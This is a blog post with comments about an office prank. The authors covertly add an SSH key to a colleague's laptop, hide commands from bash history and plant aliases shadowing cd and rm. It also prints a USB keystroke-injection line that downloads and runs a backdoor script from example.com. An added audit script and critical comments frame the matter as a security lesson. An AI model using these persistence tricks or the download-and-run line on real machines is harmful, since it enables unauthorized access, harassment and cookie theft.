Our colleague did not care about security and we pranked him

One of our office colleagues decided that it was fine to leave his laptop logged in and unattended whenever he went to the kitchen. A few other colleagues and I saw a golden opportunity to make a tech prank. One day we quickly and surreptitiously added an SSH public key to his ~/.ssh/authorized_keys file. From that time on, we were able to find the IP address of his MacBook in our office local network and, using the ssh prompt, make his laptop do just about anything.

There were probably already a lot of established security pranks we could have used, but we decided to brainstorm some ideas ourselves over private messages.

Here’s the first thing we did:

 nano ~/.bashrc

The space at the beginning ensures that the command will not appear in the bash history. This works only when bash's HISTCONTROL variable is set to ignorespace or ignoreboth.

And then, somewhere in the middle of the file, we added:

alias cd="sleep 2; cd"

Due to our sly coding, over the next month, every time our colleague used the console and changed the directory with a cd command, he waited an extra two seconds. He thought that something had happened to the filesystem, but he did nothing to investigate further and did not attempt to fix it.

Then one day he asked, "Guys, do you know what might have happened with the change dir command on my Mac?" Another colleague claimed that there was a known issue introduced in some previous versions of Mac OS X. During the next couple of weeks, our poor prank victim checked for updates on his OS X every day.

We finally thought that it was time to disclose our plot and explain that the alias was created in some hidden file (which was fake information). We told him he needed to delete it using the rm command.

Of course, before telling him this, we logged in via SSH and added another alias:

alias rm="find /usr & rm"

We then gathered near his laptop and told him to delete our "malicious hidden alias file" by entering:

rm ~/.alias_file

He pressed Enter and... thought that rm was removing all his system files.

He noticed the /usr/bin/x files and pressed Ctrl+C to cancel the command and stop the deletion. But the find command was executed in the background because we happened to put an ampersand (&) after it. Thus, it was impossible to cancel the command with Ctrl+C.

There is a way to stop such commands, though: type fg and press Enter to bring the background job to the foreground, then press Ctrl+C.
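Both changes described above, the extra key in ~/.ssh/authorized_keys and the aliases shadowing cd and rm, can be found with a short audit. The script below is an added example, not part of the original post; the function names, the approved-keys allowlist file and the sample data are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): audit for the two prank changes.

# Print file:line:text for each alias that redefines a core command.
# The command list is an assumption; extend it for your environment.
find_shadowing_aliases() {
    local f
    for f in "$@"; do
        if [ -f "$f" ]; then
            grep -HnE '^[[:space:]]*alias[[:space:]]+(cd|ls|rm|cp|mv|cat|sudo|ssh|git)=' "$f" || true
        fi
    done
}

# Print each key line in authorized_keys ($1) whose base64 blob is not in the
# allowlist ($2), a hypothetical file of approved public keys, one per line.
unexpected_keys() {
    local allow="$2"
    [ -f "$1" ] || return 0
    [ -f "$allow" ] || allow=/dev/null   # no allowlist: report every key
    awk 'function blob(   i) {           # blob = field after the key type
             for (i = 1; i < NF; i++)
                 if ($i ~ /^(ssh-|ecdsa-|sk-)/) return $(i + 1)
             return ""
         }
         /^[ \t]*(#|$)/ { next }         # skip comments and blank lines
         FILENAME == ARGV[1] { ok[blob()] = 1; next }
         { b = blob(); if (b != "" && !(b in ok)) print $0 }' "$allow" "$1"
}

# Constructed sample data: a home directory in the state the post describes.
make_sample_home() {
    mkdir -p "$1/.ssh"
    printf '%s\n' 'export EDITOR=nano' 'alias ll="ls -l"' \
        'alias cd="sleep 2; cd"' 'alias rm="find /usr & rm"' > "$1/.bashrc"
    printf '%s\n' 'ssh-ed25519 AAAAC3ConstructedOwnerKey owner@laptop' \
        'ssh-ed25519 AAAAC3ConstructedOtherKey someone@else' > "$1/.ssh/authorized_keys"
    printf '%s\n' 'ssh-ed25519 AAAAC3ConstructedOwnerKey owner@laptop' > "$1/approved_keys"
}

demo_home=$(mktemp -d)
make_sample_home "$demo_home"
find_shadowing_aliases "$demo_home/.bashrc" "$demo_home/.bash_profile"
unexpected_keys "$demo_home/.ssh/authorized_keys" "$demo_home/approved_keys"
rm -rf "$demo_home"
```

Interactively, running type cd in the affected shell reports that cd is aliased and shows the definition.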

How dare we? It is immoral!

When you leave your work hardware unlocked in a public place or open-space office, you become subject to various attacks, which might have far worse consequences than the ones our colleague experienced. Actually, his data was not affected at all.

There have been many cases where temporarily employed staff (cleaners or contractors) have carefully inserted USB dongles that implemented a keyboard controller instead of mass storage and simulated keystrokes:

CTRL + ALT + T wget https://example.com/backdoor.sh && chmod +x backdoor.sh && bash backdoor.sh ENTER exit ENTER

This can be executed within a second, and then the USB dongle can be ejected. No one will notice. The camera in the room will not "see" a cleaner touching the keyboard. This backdoor script can connect to a hacker-owned server and proxy any commands and outputs via ssh. Then they can just clone your cookies and let themselves log in to any website, taking money from you or your company’s account.

The sooner you understand that only you can take care of your security, the lower the probability that you will become a victim.

#security #prank
Feb 18, 2021
by Bruce Hardy

When I was a cop, we had a case where a TA at a University wanted to teach a lesson to one of his students. The student left a computer unlocked with his account name on. The TA thought it would be a good lesson to write a death threat to the US President from the open computer. Police/Secret Service called. Ended up the TA lost his position.

Yes, I agree. The sooner people understand there are office place bullies and the concept of mob bullying the sooner people can have the courage to report behavior like this to their superiors and confidence action will be taken. Why did you think this was better than having a conversation? Why should someone have to worry an occasionally unlocked computer in a work facility is a big problem and they can't even trust their co-workers to leave it alone? That sort of thing can happen by accident. So, yes, I agree that people need to protect themselves from becoming victims to people like you.

What a toxic workplace this must be. Gas-lighting your colleague and also rendering his laptop unusable "as a joke" is just straight up bullying. There's something wrong with you if you think this is amusing.

@Email Tester You don't need sudo (root access) to add executable permission to an sh file. You can test it by yourself, just create an empty test.sh and run chmod +x test.sh. Also then you can run this file. It can read cookies because they are created by the browser process, which is executed by your user.

How is it possible to execute this command without sudo access? "chmod +x backdoor.sh"